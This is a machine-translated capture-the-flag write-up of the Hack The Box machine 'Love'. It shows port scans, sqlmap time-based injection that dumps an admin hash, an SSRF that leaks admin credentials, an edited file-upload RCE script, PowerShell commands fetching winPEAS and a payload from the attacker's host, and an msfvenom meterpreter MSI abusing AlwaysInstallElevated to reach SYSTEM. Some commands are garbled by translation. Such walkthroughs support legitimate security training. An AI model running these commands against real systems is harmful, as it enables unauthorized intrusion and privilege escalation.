disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused

Service to detect

Open port detection

Chrysene ─(root💀kali)-[~/ HTB /Love] ├ ─# nmap-p-10.07.88 --open ⨯ Starting nmap 7.92 (https://nmap.org) at 2022-01-10 08:49 EST Nmap scan report for 10.10.10.239 Host is up (0.38s latency). Not shown: 64817 closed tcp ports (reset), 699 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3306/tcp open mysql 5000/tcp open upnp 5040/tcp open unknown 5985/tcp open wsman 5986/tcp open wsmans 7680/tcp open pando-pub 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown Nmap done: 1 IP address (1 host up) Scanned in 188.90 secondsCopy the code

Port Details

┌ ─ ─ (root 💀 kali) - ~ / HTB/Love └ ─ # nmap - sV - Pn - AO 10.10.10.239 - P 80135139443445330 6500 0504 0598 5598 6768 0470 01496 64496 65496 66496 67496 68496 69496 70 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 08:54 EST Failed to resolve "80135139443445330 6500 0504 0598 5598 6768 0470 01496 64496 65496 66496 67496 68496 69496 70", Failed to resolve "80135139443445330 6500 0504 0598 5598 6768 0470 01496 64496 65496 66496 67496 68496 69496 70". The Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 Undergoing SYN Stealth Scan Nmap Scan Report for 10.10.10.239 Host is up (0.40s latency). Not shown: 992 Closed TCP ports (reset) PORT STATE SERVICE VERSION 80/ TCP open HTTP Apache HTTPD 2.4.46 ((Win64) OpenSSL/ 1.1j PHP / 7.3.27) | HTTP cookies - flags: | / : | PHPSESSID: | _ httponly flag not set | _http - the title: Voting System using PHP |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 135/ TCP open MSRPC Microsoft Windows RPC 139/ TCP open netbios-SSN Microsoft Windows netbios - 443 / TCP open SSN SSL/HTTP Apache HTTPD 2.4.46 of / 1.1.1 j PHP / 7.3.27) | _ssl - date: TLS randomness does not represent time | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_http-server-header: Apache / 2.4.46 (Win64) OpenSSL / 1.1.1 j PHP / 7.3.27 | TLS - alpn: HTTP / 1.1 | | _ _http - the title: 403 Forbidden 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? | fingerprint-strings: | FourOhFourRequest, NULL, NotesRPC: | _ the Host '10.10.14.5' is not allowed to connect to this MariaDB server 5000 / TCP open HTTP Apache HTTPD 2.4.46 Of / 1.1.1 j PHP / 7.3.27) | _http - server - the header: Apache / 2.4.46 (Win64) OpenSSL / 1.1.1 j PHP / 7.3.27 | _http - the title: 403 Forbidden 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF - Port3306 - TCP: V = I = D = 1/7% 7.92% 10% Time = P = x86_64 dc3ada % 61 - PC - Linux - gnu % r (NU SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allowe SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourReq SF:uest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allo SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,49 SF:,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allowed\x20 SF:to\x20connect\x20to\x20this\x20MariaDB\x20server"); Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (96%), Microsoft Windows Longhorn (95%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 1909 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%) No exact OS matches for host (Test conditions non ideal). Network Distance: 2 hops Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21 m32s | smb2 ws-security - mode: | 3.1.1: | _ Message signing enabled but not required | smb2 - time: | date: 2022-01-10T14:17:58 |_ start_date: N/A | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: 10 Pro 19042 Windows (Windows 10 Pro 6.3) | OS CPE: CPE: / o: Microsoft: windows_10: : - | Computer name: Love | NetBIOS computer name: LOVE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-01-10T06:17:59-08:00 TRACEROUTE (using port 8080/ TCP) HOP RTT ADDRESS 1 403.34 ms 10.10.14.1 2 403.58ms 10.10.10.239 Failed to resolve "80135139443445330 6500 0504 0598 5598 6768 0470 01496 64496 65496 66496 67496 68496 69496 70". The OS and the Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 147.82 secondsCopy the code

web

┌ ─ ─ (root 💀 kali) - ~ / dirsearch └ ─ # python3 dirsearch. Py - e * t - 100 - u _ | http://10.10.10.239. _ _ _ _ _ _ | _ v0.4.2 (_ | | | _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492 Output File: / root/dirsearch/reports / 10.10.10.239 / _22-01-10 _08-39-35. TXT the Error Log: / root/dirsearch _08 / logs/errors - 22-01-10-39-35 in the log Target: http://10.10.10.239/ [08:39:38] Starting: [08:40:04] - 337 - b - 301 / ADMIN - > http://10.10.10.239/ADMIN/ [08:40:04] - 337 - b - 301 / ADMIN - > http://10.10.10.239/Admin/ [08:40:14] 301-337 - b - / admin - > http://10.10.10.239/Admin/ [08:40:14] - 338 - b - 301 / admin. - > http://10.10.10.239/admin./ [08:40:15] 200-6 KB - / admin / [08:40:15] - 302 - b - 403 / admin /. Htaccess file [08:40:15] - 200 6KB - /admin%20/ [08:40:16] 302 - 0B - /admin/login.php -> index.php [08:40:16] 200 - 6KB - /admin/? /login [08:40:17] 200 - 6KB - /admin/index.php [08:40:17] 302 - 16KB - /admin/home.php -> index.php [08:40:37] 301 - 348 b - / bower_components - > http://10.10.10.239/bower_components/ [08:40:39] - 7 KB - 200 / bower_components / [08:40:48] KB - 200-1 / dist / [08:40:48] - 336 - b - 301 / dist - > http://10.10.10.239/dist/ [08:40:57] 302-0 b - / home. PHP - > Index.php [08:40:58] - 338 - b - 301 / images - > http://10.10.10.239/images/ [08:40:58] 200-2 KB/images / [08:40:58], 503 - 402B - /examples/ [08:40:59] 200 - 4KB - /index.php [08:41:00] 200 - 4KB - /index.pHp [08:41:01] 200 - 4KB - /index.php/login/ [08:41:01] 200 - 4KB - /index.php. [08:41:01] 200 - 2KB - /includes/ [08:41:01] 301 - 340B - /includes - > http://10.10.10.239/includes/ [08:41:05] 302-0 b - / login. PHP - > index. The PHP [08:41:06] 302-0 b - / logout. PHP - > Index.php [08:41:20] - 339 - b - 301 / plugins - > http://10.10.10.239/plugins/ [08:41:20] - 2 KB - 200 / plugins /Copy the code

Port 80 is a Web app called Voting System that Kali searches for vulnerabilities

Chrysene ─(root💀kali)-[~/dirsearch] ├ ─# searchsploit voting System 6 ⨯ ------------------------------------------------------------------------------------------------------------------------ --- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------ --- --------------------------------- Online Voting System - Authentication Bypass | php/webapps/43967.py Online Voting 1.0 Authentication System Bypass (SQLi) | PHP/webapps / 50075. TXT Online Voting System 1.0 Remote Code Execution (Authenticated) | PHP/webapps / 50076. TXT Online Voting System 1.0 SQLi (Authentication Bypass) + Remote Code Execution (RCE) | php/webapps/50088.py Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting | Multiple/webapps / 49159. TXT Voting System 1.0 Authentication Bypass (SQLI) | PHP/webapps / 49843. TXT Voting System 1.0 The File Upload RCE (Authenticated Remote Code Execution) | PHP/webapps / 49445. Py Voting System 1.0 Remote Code Execution (Unauthenticated) | PHP/webapps / 49846. TXT Voting System 1.0 Time -based SQLI | (Unauthenticated SQL injection) WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt ------------------------------------------------------------------------------------------------------------------------ --- --------------------------------- Shellcodes: No ResultsCopy the code

There’s an unauthorized RCE. You can’t try. There’s also an authorized RCE, but I don’t have login credentials. There is also SQL injection, if there is SQL injection, then we can get the user credentials and try the RCE for authorization

Try SQL injection

┌ ─ ─ (root 💀 kali) - ~ / HTB/Love └ ─ # sqlmap - r data - batch - p voter - level 5 - risk 3 ___ __H__ ___ ___ ____ ___ ___ [.] # {1.5.12 stable} | -- - |. ["]. | |. | | ___ | _ [and] _ _ - | | _ | __, | _ | | _ | V... |_| https://sqlmap.org [!]  legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 09:33:05 /2022-01-10/ [09:33:05] [INFO] parsing HTTP request from 'data' [09:33:05] [INFO] resuming back-end DBMS 'mysql' [09:33:05] [INFO] testing connection to the target URL got a 302 redirect to 'http://10.10.10.239:80/index.php'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: voter (POST) Type: Time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voter=admin' AND (SELECT 4771 FROM (SELECT(SLEEP(5)))YdaT) AND 'Vvvd'='Vvvd&password=123&login=asd --- [09:33:08] [INFO] MySQL web Application Technology: PHP 7.3.27, Apache 2.4.46 backend DBMS: MySQL >= 5.0.12 (MariaDB fork) [09:33:08] [INFO] touchdatelogged to text files under '/ root/local/share/sqlmap/output / 10.10.10.239' [*] ending @ 09:33:08/2022-01-10 /Copy the code

Verify that time-based SQL injection exists for the user name voter field

The following payload gets all database names

sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T --dbs
Copy the code

return

available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] votesystem

Copy the code

Same method, test step by step, get the user’s credentials with the following payload

sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T -D votesystem -T admin -C username,password --dump

Database: votesystem
Table: admin
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$psrWULJqgpPOl4HUt.ctM.vFMYJjh65EiRFDbIAZsa3z/F3t/8zXW |
+----------+--------------------------------------------------------------+

Copy the code

But I couldn’t break it with John or Hashcat

Vhost blasting

Echo “10.10.10.239 love. HTB “>> /etc/hosts

Use GoBuster to blast subdomains

┌ ─ ─ (root 💀 kali) - ~ / HTB/Love └ ─ # gobuster vhost - u Love. HTB - w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = Gobuster v3.1.0 by OJ Reeves (@ TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://love.htb [+] Method: GET [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt [+] User Agent: Gobuster / 3.1.0 [+] a Timeout: 10s =============================================================== 2022/01/24 00:57:35 Starting gobuster in VHOST enumeration mode =============================================================== Found: staging.love.htb (Status: 200) [Size: 5357]Copy the code

Get a staging.love. HTB subdomain

Add the domain name to the hosts file and open port 80 to a Web app called Free File Scanner

SSRF

In the Demo module, you are asked to enter a URL address, try to write a PHP file locally, start a simple Web server in Python, and then access the PHP file. It shows that it is accessible, but PHP is not executed

Try accessing port 80 from the Intranet: http://127.0.0.1 Return to the login page

Try Intranet access to port 443: http://127.0.0.1:443 return

Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.
Copy the code

Attempt to access port 5000 from the Intranet

http://127.0.0.1:5000 exposed the password information of admin

Vote Admin Creds admin: @LoveIsInTheAir!!!!

foodhold

Now that we have the login information, we can use the authorized RCE to get the shell

Voting System 1.0 File Upload RCE (Authenticated Remote Code Execution) | PHP/webapps / 49445. PyCopy the code

The source code needs to edit the relevant information, and modify the path

# -- Edit your Settings here ---- IP = "10.10.10.239" # Website's URL USERNAME = "admin" #Auth USERNAME PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password REV_IP = "10.10.14.3" # Reverse shell IP REV_PORT = "4242" # Reverse port # -------------------------------- INDEX_PAGE = f"http://{IP}/admin/index.php" LOGIN_URL = f"http://{IP}/admin/login.php" VOTE_URL = f"http://{IP}/admin/voters_add.php" CALL_SHELL = f"http://{IP}/images/shell.php"Copy the code

Received bounce shell after execution

Chrysene ─(root💀kali)-[~/ HTB /Love] ├ ─# nC-lvnp 785 1 ⨯ listening on [any] 785... Connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 53219 B374K shell: Connected Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\xampp\htdocs\omrs\images>whoami whoami love\phoebeCopy the code

Right to mention

Send Winpeas to the target

powershell -c "(new-object System.Net.WebClient). DownloadFile (' http://10.10.14.3/winPEASx64.exe ', 'c: \ Users \ Phoebe \ Downloads \ winPEASx64 exe')"Copy the code

Registry claim

Run Winpeas and find that both HKLM and HKCU are 1

� � � � � � � � � � ͹ Checking AlwaysInstallElevated � https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated AlwaysInstallElevated set to 1 in HKLM! AlwaysInstallElevated set to 1 in HKCU!Copy the code

That means we can use Registry Escalation

Compile a rebound shell MSI file

┌ ─ ─ (root 💀 kali) - ~ / HTB/Love └ ─ # msfvenom - p Windows/meterpreter/reverse_tcp lhost = 10.10.14.3 lport = 4444 - f msi - o setup.msi [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of msi file: 159744 bytes Saved as: setup.msiCopy the code

To the target

powershell -c "(new-object System.Net.WebClient). DownloadFile (' http://10.10.14.3/setup.msi ', 'c: \ Users \ Phoebe \ Downloads \ setup. The msi')"Copy the code

Execute the MSI file

c:\Users\Phoebe\Downloads>.\setup.msi
.\setup.msi

Copy the code

Received rebound shell

Msf6 exploit(multi/handler) > Run [*] Started reverse TCP handler on 10.10.14.3:4444 [*] Sending stage (175174 bytes) to 10.10.10.239 [*] Meterpreter Session 1 Opened (10.10.14.3:4444 -> 10.10.10.239:53222) at 2022-01-24 02:33:20-0500 meterpreter > getuid Server username: NT AUTHORITY\SYSTEMCopy the code

You have the SYSTEM permission.